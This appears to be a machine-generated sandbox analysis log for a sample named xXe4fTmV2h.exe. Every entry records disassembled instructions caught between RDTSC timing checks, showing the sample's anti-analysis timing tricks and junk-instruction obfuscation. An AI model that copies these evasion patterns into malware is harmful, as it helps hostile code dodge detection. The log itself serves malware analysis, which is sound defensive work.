Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5B10 second address: 14B5B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5DED second address: 14B5DF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5DF1 second address: 14B5DF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14B5DF5 second address: 14B5DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BCC64 second address: 14BCC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BCC6A second address: 14BCC70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BCC70 second address: 14BCC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FB0A5355D56h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007FB0A5355D56h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BCC85 second address: 14BCC91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FB0A4FB5B86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BCC91 second address: 14BCC9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FB0A5355D56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BC0B9 second address: 14BC0C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB0A4FB5B86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BC0C5 second address: 14BC0C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BC253 second address: 14BC25A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BC25A second address: 14BC265 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FB0A5355D56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BC50C second address: 14BC510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14BC510 second address: 14BC536 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB0A5355D56h 0x00000008 jmp 00007FB0A5355D60h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FB0A5355D5Ch 0x00000015 jnc 00007FB0A5355D56h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147E7CF second address: 147E7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147E99A second address: 147E9B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FB0A5355D61h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147EDED second address: 147EDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147EEE5 second address: 147EEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147EEE9 second address: 147EF14 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jns 00007FB0A4FB5B98h 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FB0A4FB5B86h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147EF14 second address: 147EF26 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jng 00007FB0A5355D64h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147EF26 second address: 147EF2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147EF2C second address: 147EF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FB0A5355D56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147F02B second address: 147F048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147F048 second address: 147F052 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB0A5355D5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147F052 second address: 147F0AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FB0A4FB5B8Eh 0x0000000c xchg eax, esi 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FB0A4FB5B88h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 movzx edx, bx 0x0000002a pushad 0x0000002b mov dword ptr [ebp+129C1B0Bh], eax 0x00000031 mov ebx, dword ptr [ebp+129C2C87h] 0x00000037 popad 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FB0A4FB5B94h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 147F0AE second address: 147F0BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A5355D5Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14C4D32 second address: 14C4D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14C4D38 second address: 14C4D5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Ah 0x00000007 jmp 00007FB0A5355D68h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14C4D5E second address: 14C4D80 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB0A4FB5B92h 0x00000008 jmp 00007FB0A4FB5B8Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FB0A4FB5B86h 0x00000015 jp 00007FB0A4FB5B86h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 14C4EBA second address: 14C4ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FB0A5355D68h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 165DA27 second address: 165DA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 165DA2B second address: 165DA30 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 165DA30 second address: 165DA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410033 second address: 7410038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410038 second address: 74100BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB0A4FB5B96h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov esi, 05D70C1Dh 0x00000017 pushfd 0x00000018 jmp 00007FB0A4FB5B8Ah 0x0000001d jmp 00007FB0A4FB5B95h 0x00000022 popfd 0x00000023 popad 0x00000024 mov eax, dword ptr fs:[00000030h] 0x0000002a jmp 00007FB0A4FB5B8Eh 0x0000002f sub esp, 18h 0x00000032 jmp 00007FB0A4FB5B90h 0x00000037 xchg eax, ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov di, 1120h 0x0000003f mov ecx, edx 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74100BE second address: 74100DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB0A5355D60h 0x00000008 movzx eax, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74100DE second address: 74100E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74100E4 second address: 741019D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A5355D5Eh 0x00000009 jmp 00007FB0A5355D65h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007FB0A5355D60h 0x00000015 or ax, 2028h 0x0000001a jmp 00007FB0A5355D5Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FB0A5355D64h 0x0000002b and cl, FFFFFF88h 0x0000002e jmp 00007FB0A5355D5Bh 0x00000033 popfd 0x00000034 mov di, cx 0x00000037 popad 0x00000038 mov ebx, dword ptr [eax+10h] 0x0000003b pushad 0x0000003c jmp 00007FB0A5355D60h 0x00000041 pushad 0x00000042 mov ax, di 0x00000045 popad 0x00000046 popad 0x00000047 push ecx 0x00000048 pushad 0x00000049 call 00007FB0A5355D64h 0x0000004e mov ecx, 54F279E1h 0x00000053 pop eax 0x00000054 movsx ebx, ax 0x00000057 popad 0x00000058 mov dword ptr [esp], esi 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741019D second address: 74101A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74101A2 second address: 74101A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74101A8 second address: 74101AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74101AC second address: 74101DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [757806ECh] 0x0000000e jmp 00007FB0A5355D5Bh 0x00000013 test esi, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB0A5355D65h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74101DE second address: 7410290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FB0A4FB6B7Fh 0x00000010 pushad 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FB0A4FB5B91h 0x00000018 sub ch, 00000026h 0x0000001b jmp 00007FB0A4FB5B91h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FB0A4FB5B90h 0x00000027 and eax, 742370C8h 0x0000002d jmp 00007FB0A4FB5B8Bh 0x00000032 popfd 0x00000033 popad 0x00000034 pushfd 0x00000035 jmp 00007FB0A4FB5B98h 0x0000003a add eax, 0AC6F328h 0x00000040 jmp 00007FB0A4FB5B8Bh 0x00000045 popfd 0x00000046 popad 0x00000047 xchg eax, edi 0x00000048 jmp 00007FB0A4FB5B96h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FB0A4FB5B8Dh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410290 second address: 74102A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74102A5 second address: 741030B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov ebx, eax 0x0000000d pushfd 0x0000000e jmp 00007FB0A4FB5B98h 0x00000013 sub ah, 00000078h 0x00000016 jmp 00007FB0A4FB5B8Bh 0x0000001b popfd 0x0000001c popad 0x0000001d call dword ptr [75750B60h] 0x00000023 mov eax, 7668E5E0h 0x00000028 ret 0x00000029 jmp 00007FB0A4FB5B96h 0x0000002e push 00000044h 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 mov di, cx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741030B second address: 741030F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741030F second address: 7410355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FB0A4FB5B96h 0x0000000b movzx esi, bx 0x0000000e pop edx 0x0000000f popad 0x00000010 pop edi 0x00000011 jmp 00007FB0A4FB5B8Ah 0x00000016 xchg eax, edi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FB0A4FB5B97h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410355 second address: 741035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741035B second address: 741035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741035F second address: 741036E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741036E second address: 741038E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741038E second address: 74103A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741041D second address: 7410422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410422 second address: 7410428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410428 second address: 7410454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FB1132A4DEFh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB0A4FB5B8Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410454 second address: 741045A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741045A second address: 741045E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741045E second address: 7410482 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov edi, eax 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410482 second address: 741049B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A4FB5B95h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741049B second address: 741049F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741049F second address: 74104E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi], edi 0x0000000a jmp 00007FB0A4FB5B8Dh 0x0000000f mov dword ptr [esi+04h], eax 0x00000012 jmp 00007FB0A4FB5B8Eh 0x00000017 mov dword ptr [esi+08h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB0A4FB5B97h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74104E3 second address: 74105C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A5355D5Fh 0x00000009 sbb ax, BFCEh 0x0000000e jmp 00007FB0A5355D69h 0x00000013 popfd 0x00000014 mov edx, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esi+0Ch], eax 0x0000001c pushad 0x0000001d mov di, si 0x00000020 pushfd 0x00000021 jmp 00007FB0A5355D64h 0x00000026 add esi, 23544B78h 0x0000002c jmp 00007FB0A5355D5Bh 0x00000031 popfd 0x00000032 popad 0x00000033 mov eax, dword ptr [ebx+4Ch] 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FB0A5355D64h 0x0000003d add eax, 7F1AE5D8h 0x00000043 jmp 00007FB0A5355D5Bh 0x00000048 popfd 0x00000049 pushfd 0x0000004a jmp 00007FB0A5355D68h 0x0000004f add esi, 1F7E3038h 0x00000055 jmp 00007FB0A5355D5Bh 0x0000005a popfd 0x0000005b popad 0x0000005c mov dword ptr [esi+10h], eax 0x0000005f jmp 00007FB0A5355D66h 0x00000064 mov eax, dword ptr [ebx+50h] 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74105C2 second address: 74105C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74105C8 second address: 74105CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74105CE second address: 7410619 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+14h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FB0A4FB5B8Dh 0x00000016 pushfd 0x00000017 jmp 00007FB0A4FB5B90h 0x0000001c sbb eax, 71442F58h 0x00000022 jmp 00007FB0A4FB5B8Bh 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410619 second address: 7410663 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c jmp 00007FB0A5355D5Eh 0x00000011 mov dword ptr [esi+18h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB0A5355D67h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410663 second address: 74106B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 4868593Ah 0x00000008 pushfd 0x00000009 jmp 00007FB0A4FB5B8Bh 0x0000000e adc si, B8DEh 0x00000013 jmp 00007FB0A4FB5B99h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [ebx+58h] 0x0000001f jmp 00007FB0A4FB5B8Eh 0x00000024 mov dword ptr [esi+1Ch], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74106B3 second address: 74106B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74106B7 second address: 74106BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74106BD second address: 74106D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 mov dh, ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+5Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74106D0 second address: 74106D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74106D4 second address: 74106E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74106E6 second address: 74107C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 4514h 0x00000007 movsx edi, cx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+20h], eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FB0A4FB5B92h 0x00000017 jmp 00007FB0A4FB5B95h 0x0000001c popfd 0x0000001d jmp 00007FB0A4FB5B90h 0x00000022 popad 0x00000023 mov eax, dword ptr [ebx+60h] 0x00000026 pushad 0x00000027 jmp 00007FB0A4FB5B8Eh 0x0000002c movzx ecx, di 0x0000002f popad 0x00000030 mov dword ptr [esi+24h], eax 0x00000033 pushad 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FB0A4FB5B94h 0x0000003b xor si, 4CB8h 0x00000040 jmp 00007FB0A4FB5B8Bh 0x00000045 popfd 0x00000046 popad 0x00000047 pushfd 0x00000048 jmp 00007FB0A4FB5B98h 0x0000004d and si, 8718h 0x00000052 jmp 00007FB0A4FB5B8Bh 0x00000057 popfd 0x00000058 popad 0x00000059 mov eax, dword ptr [ebx+64h] 0x0000005c jmp 00007FB0A4FB5B96h 0x00000061 mov dword ptr [esi+28h], eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FB0A4FB5B8Ah 0x0000006d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74107C8 second address: 74107CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
